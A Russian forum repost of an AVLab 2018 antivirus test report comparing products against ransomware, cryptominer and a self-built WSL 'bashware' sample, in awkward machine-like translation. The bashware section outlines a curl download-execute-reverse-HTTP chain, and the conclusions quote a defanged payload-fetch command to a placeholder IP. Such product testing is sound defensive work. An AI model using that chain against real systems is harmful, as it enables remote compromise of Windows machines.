AVLAB Tests

Аватара пользователя

Автор темы
CIS
Администратор
Администратор
Сообщения: 1754
Зарегистрирован: 12 фев 2011, 22:58
Репутация: 0
Поблагодарили: 1 раз
Контактная информация:

AVLAB Tests

Непрочитанное сообщение CIS » 16 июн 2018, 11:25

Изображение

AVLab объединяет энтузиастов в области антивирусной защиты и безопасности в Интернете. Лаборатория проводит тестирование программ и делится результатами анализа с пользователями Интернета. Организация не находится под контролем и никак не связана с разработчиками программных продуктов.

Результаты испытаний AVLab являются независимыми. В тестах моделируются ситуации, максимально приближенные к сценариям реального использования. Не стоит полагаться исключительно на результаты AVLab при выборе антивируса. Чтобы сделать правильный выбор, рекомендуется ознакомиться с тестами других независимых лабораторий, которые используют иные методы и техники оценки. Кроме того, выбирая антивирус, нужно учитывать множество различных факторов: персональные предпочтения, необходимые функции, эффективность, уровень обнаружения, воздействие на производительность, интерфейс, стоимость, удобство использования, совместимость, поддерживаемые языки, качество технической поддержки и др.
Изображение

Обсуждение там:

Аватара пользователя

Автор темы
CIS
Администратор
Администратор
Сообщения: 1754
Зарегистрирован: 12 фев 2011, 22:58
Репутация: 0
Поблагодарили: 1 раз
Контактная информация:

AVLAB Tests

Непрочитанное сообщение CIS » 16 июн 2018, 12:27

Лучшее антивирусное программное обеспечение в 2018 году на основе трех тестов безопасности


Логотип Checklab, расположенный в нижнем колонтитуле на нашем веб-сайте, тесно связан с тестами, проводимыми AVLab в период с 7 по 22 мая 2018 года. CheckLab наш новый бренд - это веб-сайт, на котором мы будем публиковать подробные отчеты. Мы работаем над алгоритмами более 15 месяцев, которые полностью автоматизируют тесты, проведенные на вредоносных программных образцах, снятых при атаках на honeypots. Ядро проекта основано на дистрибутиве Ubuntu 16 LTS, а система тестирования PERUN была оснащена модулями для анализа образцов вирусов, корреляции и анализа собранных журналов, а также управления системами Windows 10. Система PERUN представляет собой комбинацию языков программирования NodeJS и Python. Мы надеемся, что это решение предоставит самую трудоемкую работу вычислительной мощности машин, что позволит нам представить результаты антивирусной защиты из двух областей: против угроз в дикой природе и новых технологий обхода безопасности.

Программирование проекта CheckLab на самом низком уровне (backend), невидимое для пользователя, было завершено в апреле, поэтому мы хотели использовать готовое решение для проведения первых публичных тестов на основе системы тестирования PERUN. Самая трудоемкая работа, продолжавшаяся с 7 по 22 мая, была выполнена с помощью запрограммированных алгоритмов, которые автоматизируют управление системами и действиями Windows 10, которые необходимы для проверки вредных последствий образцов вредоносных программ и изучения эффективности программного обеспечения безопасности. Более подробная информация о системе тестирования PERUN будет представлена ​​в день запуска CheckLab. Однако в этой статье мы сосредоточили внимание на информации, которая непосредственно касается целых трех тестов безопасности.

Сэмплы вредоносных программ


Контрольная точка предоставила статистическую информацию об атаках и угрозах в отношении нашей страны предоставлено Check Point.

Вымогатели


В апреле и июне 2017 года WannaCry и Petya вымогатели атаковали тысячи компаний из многих отраслей промышленности по всему миру. По оценкам, глобальные потери, вызванные этими нападениями, включая снижение производительности и затраты на минимизацию ущерба, оцениваются в 4 млрд. Долл. США [1]. Такие астрономические суммы, полученные от незаконной деятельности, подтверждают прибыльность этого криминального бизнеса, и нет никаких указаний на то, что эта тенденция будет отменена в будущем.
Изображение

Данные, предоставленные Check Point, указывают на то, что ransomware чаще атаковали компании из Польши, чем из других стран, хотя в первые месяцы 2018 года мы наблюдали тенденцию к снижению. Этот вид вредоносного ПО по-прежнему очень активен, поэтому разработчики SaaS (Security as Service), сетевого оборудования и программного обеспечения для обеспечения безопасности должны предоставлять более качественные продукты для блокирования современных векторов атак.

Cryptominer


В период с июля по декабрь 2017 года [2] одна из пяти организаций подвергалась нападению с помощью вредоносного программного обеспечения cryptominer, которое позволяет киберпреступникам брать на себя вычислительную мощность процессора или графического процессора и существующих ресурсов для того, чтобы вызывать криптовалюты. Данные Check Point временно указывают на уменьшение количества вредоносных скриптов. Это не означает, что майнеры криптовалюты полностью исчезнут из ландшафта безопасности.
Изображение

Растущий интерес к виртуальным валютам замедлял процесс добычи, поскольку скорость прохождения последующих математических вычислений напрямую зависит от количества держателей криптовалюты. Это побудило киберпреступников придумать новые способы использования вычислительных ресурсов ничего не подозревающего сообщества, участвующих в процессе разработки криптовалютных ресурсов, используя технологию блочных цепочек.

В Польше самая высокая активность угроз криптоминера была зафиксирована в период с января по апрель 2018 года. Почти все платные и бесплатные операционные системы не защищены от этого типа вредоносного программного обеспечения. Киберпреступники не отказываются от своих действий и контрабанды вредоносных сценариев в системы Windows, включая серверы на Linux и рабочий стол. Последние освещенные события:
*Два приложения в Ubuntu Snap Store [3].
* Drupal apocalypse, который привел к созданию эксплойтов, готовых к импорту в Metasploit, которые могут заражать веб-сайты вредоносными сценариями [4].
* Вредоносная программа, использующая вычислительную мощность в системах iOS [5] и Android [6].

Bashware


Этот тип вредоносного программного обеспечения, обнаруженный и представленный экспертами Check Point, официально не был идентифицирован при атаках на организации или пользователей. Мы предприняли шаги, чтобы привлечь внимание разработчиков к проблеме, с которой они, возможно, придется иметь дело. Метод, который использует функцию WSL (подсистема Windows для Linux), позволяющую запускать исполняемые файлы системы Linux, может потенциально угрожать сотням миллионов устройств с установленной Windows 10 на компьютере. Функция WSL делает популярный терминал bash доступным для пользователей Windows 10. Действия вредоносных программ в гибридной концепции могут открыть новую дверь для преступников. По мнению многих экспертов, угроза bashware должна быть серьезным предупреждением, поскольку она открывает новые возможности для обхода безопасности сторонних разработчиков и программного обеспечения защиты Microsoft. Доступны ли популярные антивирусные решения на рынке для мониторинга файлов, запущенных в гибридной концепции? Оказывается, да, потому что вектор атаки начинается с приложения «bash.exe», которое при запуске открывает консоль, запускающую оболочку Bash в Windows 10.
: [1] trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/the-cost-of-compromise
[2] research.checkpoint.com/h2-2017-global-threat-intelligence-trends-report
[3] avlab.pl/pl/koparka-kryptowaluty-bytecoin-na-linuxa-przemycona-w-aplikacji-z-ubuntu-snap-store
[4] avlab.pl/pl/sa-juz-efekty-drupalgeddonu-niezaktualizowane-polskie-strony-kopia-kryptowalute
[5] blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack
[6] securelist.com/pocket-cryptofarms/85137


Оригинальные сэмплы для теста


Идеальный источник образцов - это тот, который предоставляет новые и различные типы вредоносного программного обеспечения. В этом случае «свежесть» собранных образцов очень важна, поскольку она влияет на реальную защиту от угроз, которые можно найти в дикой природе.

Образцы, используемые в этом тесте, исходят от атак на нашу сеть honeypots, которые являются очень важным инструментом для экспертов по безопасности. Цель ловушек для злоумышленников, сценариев kiddie или других скриптов - притворяться «жертвой» (с точки зрения систем, служб или протоколов) и сохранять, в частности, журналы от атак, включая вредоносное ПО. В настоящее время мы используем ловушки, которые эмулируют такие сервисы, как SSH, HTTP, HTTPS, SMB, FTP, TFTP и другие.
Изображение

Ниже приведены локализации honeypots, которые мы используем для получения образцов вредоносных программ: Канады, США, Бразилии, Великобритании, Нидерландов, Франции, Италии, Чехии, Польши, России, Индии, Сингапура, Японии, Австралии, Южной Африки.
Изображение

Мы не хотели представлять защитную картину по старым и известным угрозам, поэтому для теста мы использовали 43 уникальных образца вымогательства, 35 криптовалют-майнеров и 1 образец bashware. Поскольку мы не сталкивались с угрозой bashware, мы создали свою собственную: в системе Windows 10, установленной на машине, мы активировали WSL-функцию с системой Ubuntu (этот процесс также можно автоматизировать с помощью команд в Powershell). Таким образом, наша угроза bashware:

* Ran "bash.exe и загрузил файл, содержащий команду полезной нагрузки, с управляемого веб-сервера с использованием библиотеки сетевого программирования" / bin / bash / curl ".
* После загрузки полезной нагрузки она была преобразована в ее первоначальную форму и автоматически запущена.
* Если вирус был успешно запущен, он открыл возможность доступа к зараженной машине (обратный HTTP).

Задача тестируемого программного обеспечения заключалась в блокировании лечения на одном из описанных этапов.

Методология
Изображение

Тест, который воспроизводит реальное поведение пользователя и вредоносного программного обеспечения, является самым надежным для пользователей и разработчиков Интернета, но прежде чем каждый образец будет перенесен на компьютеры с установленным программным обеспечением безопасности, его следует тщательно проанализировать. Мы должны быть уверены, что для тестирования будут допущены только «100%» вредные образцы. Событие, когда вирус не работает в системе, потому что он запрограммирован для другого географического региона, никогда не случится в наших тестах. Благодаря этому, читатели и разработчики уверены, что вредоносное ПО, которое было квалифицировано для тестирования, может серьезно заразить операционную систему независимо от того, в какой части мира она исходит.

Прежде чем потенциально опасный образец подходит для тестирования, один из компонентов системы тестирования PERUN проверяет, действительно ли вредоносное ПО сделает нежелательные изменения в Windows 10. Для этого каждый вирус анализируется на 15 минут. Человеческий фактор, исключенный из тестов, не позволяет определить, например, вредоносная программа завершит свою деятельность через 60 секунд. Нам нужно установить определенный порог времени, после которого мы прекратим анализ. Мы знаем о том, что существует опасное программное обеспечение, которое может задержать его запуск даже до десятка часов до его активации. Он также может прослушивать подключения к серверу C & C на эфемерном порту. Также были ситуации, когда вредоносное программное обеспечение было запрограммировано на заражение определенного приложения или дождаться открытия веб-сайта. По этой причине мы приложили все усилия для того, чтобы наши тесты были максимально приближены к реальности, поэтому образцы, которые являются «неопределенными», никогда не будут включены в вирусную базу данных тестов.

После анализа вредоносного приложения журналы из активности вредоносного ПО экспортируются во внешнюю часть системы тестирования PERUN. На основе собранной информации алгоритмы решают, является ли конкретный образец вредным. Если это так, он сразу же передается всем системам с программным обеспечением безопасности на плате по протоколу HTTP.

Результаты блокирования отдельных образцов вирусов были разделены на три уровня:

* Ранний уровень: вирус был заблокирован в браузере или после загрузки в операционной системе и сохранен в папке назначения c: \ download или во время попытки копирования из c: \ download в c: \ destination.
* Средний уровень: вирус был помещен в карантин после сохранения в папке назначения c: \ destination или во время попытки запуска.
* Низкий уровень: вирус был заблокирован после запуска и не заразил систему.

РЕЗУЛЬТАТЫ: ТЕСТ ПРОТИВ УГРОЗ ВЫМОГАТЕЛЕЙ
Изображение

Почти все программное обеспечение безопасности гарантирует защиту от высокоуровневого шифрования файлов. Хотя тест был подготовлен по настройкам по умолчанию, очень важно, чтобы каждый пользователь помнил об увеличении агрессивности эвристики и настройке антивирусных настроек путем активации отключенных по умолчанию компонентов защиты. Не все угрозы передаются по протоколу HTTP. Некоторые вирусы отправляются на компьютеры через почтовый клиент, используя протокол IMAP. Различия между обнаружением угроз в различных протоколах могут быть значительными.

РЕЗУЛЬТАТЫ: ТЕСТ ПРОТИВ УГРОЗ КРИПТОМАЙНЕРОВ
Изображение

Менее половины тестируемого программного обеспечения остановили все образцы угроз криптоминера. Самый слабый результат был достигнут Защитником Windows. Программное обеспечение Microsoft не имеет такой большой базы данных угроз, как конкуренция. Даже половина тестируемого антивирусного программного обеспечения не может в каждом случае сопоставлять информацию о приложении для разработки криптовалютности (e.g. xmrig), загружать один и тот же файл с помощью вируса-загрузчика и запускать вредоносное программное обеспечение внутри PowerShell.

РЕЗУЛЬТАТЫ: ТЕСТ ПРОТИВ УГРОЗ BASHWARE
Изображение

Только антивирусное программное обеспечение Panda Dome не удалось обнаружить угрозу. Тестер получил удаленный доступ к системе после заражения машины, и в этом случае результат был отрицательным. Другое программное обеспечение удалось заблокировать попытку заражения, начиная с приложения «bash.exe». Решения безопасности, SecureAPlus и VoodooShield Pro, которые управляют сценариями запуска, лучше всего справляются с командами, запущенными в терминале. Для защиты от сложных угроз мы рекомендуем пользователям выбирать программное обеспечение с брандмауэром, расширенный контроль угроз или защиту на основе белых списков файлов и проверку выполняемых сценариев в системных интерпретаторах Windows.

ВЫВОДЫ ИЗ ТЕСТИРОВАНИЯ


Защита от вымогательства практически во всех тестируемых решениях находится на удовлетворительном уровне. Антивирусное программное обеспечение, которое может остановить 100% угроз определенного времени, не существует. Стоит использовать дополнительные механизмы или модули антивирусной защиты, которые позволяют восстанавливать файлы после процесса шифрования. Как правило, эти модули являются неотъемлемой частью надежного программного обеспечения безопасности. Даже Защитник Windows приходит с ними. В случае шифрования файлов по крайней мере данные в защищенных папках не будут потеряны безотзывно. Чем больше антивирусных программ имеет компоненты, которые контролируют безопасность рабочей среды пользователя, тем лучше. Не стоит полагаться только на антивирусную систему. Некоторое программное обеспечение испытывает трудности с обнаружением законных приложений, которые доступны в качестве официального программного обеспечения для шифрования. Проблема в том, что такие приложения устанавливаются в системе Windows совершенно незаконно, потому что они загружаются трояном или загрузчиком.

Бесплатное антивирусное программное обеспечение Panda Dome не смогло блокировать угрозу bashware. Стоит добавить, что для выполнения любой команды на терминале Bash вредоносное ПО должно запускать приложение «bash.exe». Запущенный процесс с дополнительными параметрами может быть отсканирован и заблокирован любым антивирусным программным обеспечением. То же самое относится к брандмауэру, который должен обнаружить и заблокировать попытку доступа к сети в процессе. Системы IPS и IDS также могут идентифицировать потенциальную атаку и реагировать в нужное время. Команды запуска, такие как «curl -c hxxp: // IP / sample --output / path_to_download -silent», представляют собой интересное предложение об обходе безопасности Windows 10, но вначале требуется запустить оболочку Bash.

Три теста иллюстрируют интересную ситуацию - различное программное обеспечение, использующее движок той же компании, предлагает различные, индивидуально реализованные механизмы и объем защиты системы. Например, программное обеспечение Acrabit, G Data и F-Secure с движком Bitdefender или ZoneAlarm не может быть идентифицировано с программным обеспечением компании, технология которой они используют, например, как часть контрактов OEM. Это происходит потому, что каждый разработчик реализует свои собственные механизмы, которые управляют поведением системы в разных областях (защита браузера, электронное письмо, анализ сетевого трафика, управление файловой системой и т. Д.), И используется сторонний движок (в отдельные случаи параллельно с движком от оригинального разработчика) только как механизм для анализа конкретных объектов, которые потенциально могут иметь угрозы. Эта зависимость может быть сравнена, например. к отношениям между автопроизводителями, когда производители различных марок монтируют двигатели конкурирующих компаний в рамках своих индивидуальных технологических соглашений.
Изображение


Вернуться в «Результаты тестов лабараториями»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость